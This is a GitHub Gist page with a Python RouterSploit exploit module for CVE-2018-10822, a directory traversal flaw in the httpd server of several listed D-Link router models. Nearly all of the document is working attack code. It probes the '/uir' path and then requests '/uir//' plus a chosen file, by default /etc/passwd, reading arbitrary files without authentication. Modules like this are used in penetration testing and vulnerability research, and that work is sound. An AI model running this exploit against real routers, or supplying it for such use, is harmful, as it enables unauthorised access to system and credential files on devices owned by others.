Created
October 18, 2018 20:53
-
-
Save paralax/950ed9de0d2532a36c12fe1a77eca2ba to your computer and use it in GitHub Desktop.
D-Link router Directory Traversal
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import random | |
from routersploit.core.exploit import * | |
from routersploit.core.http.http_client import HTTPClient | |
class Exploit(HTTPClient): | |
__info__ = { | |
"name": "D-Link router Directory Traversal", | |
"description": """This module exploits a vulnerability in D-Link router httpd server. An unauthenticated attacker may read arbitrary files from the system.""", | |
"authors": ( | |
"@jnazario", # routersploit module | |
'Blazej Adamczyk' # discovery and PoC | |
), | |
"references": ( | |
"http://sploit.tech/2018/10/12/D-Link.html", | |
"CVE-2018-10822" | |
), | |
"devices": ( | |
'DWR-116 through 1.06', | |
'DIR-140L through 1.02', | |
'DIR-640L through 1.02', | |
'DWR-512 through 2.02', | |
'DWR-712 through 2.02', | |
'DWR-912 through 2.02', | |
'DWR-921 through 2.02', | |
'DWR-111 through 1.01' | |
) | |
} | |
target = OptIP("", "Target IPv4 or IPv6 address") | |
port = OptPort(80, "Target HTTP port") | |
filename = OptString("/etc/passwd", "File to read from the filesystem") | |
def __init__(self): | |
self.resources = ( | |
"/uir//{}", | |
) | |
self.valid_resource = None | |
def run(self): | |
if self.check(): | |
print_success("Target appears to be vulnerable") | |
path = self.valid_resource.format(self.filename) | |
response = self.http_request( | |
method="GET", | |
path=path, | |
) | |
if response is None: | |
print_error("Error with reading response") | |
return | |
if response.text: | |
print_status("Reading file: {}".format(self.filename)) | |
print_info(response.text) | |
else: | |
print_error("Exploit failed - empty response") | |
else: | |
print_error("Exploit failed - target seems to be not vulnerable") | |
@mute | |
def check(self): | |
response = self.http_request(method='GET', | |
path=self.basepath.rstrip('/') + '/uir') | |
if response is None: | |
return False | |
if response.status_code == 200: | |
return True | |
return False |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment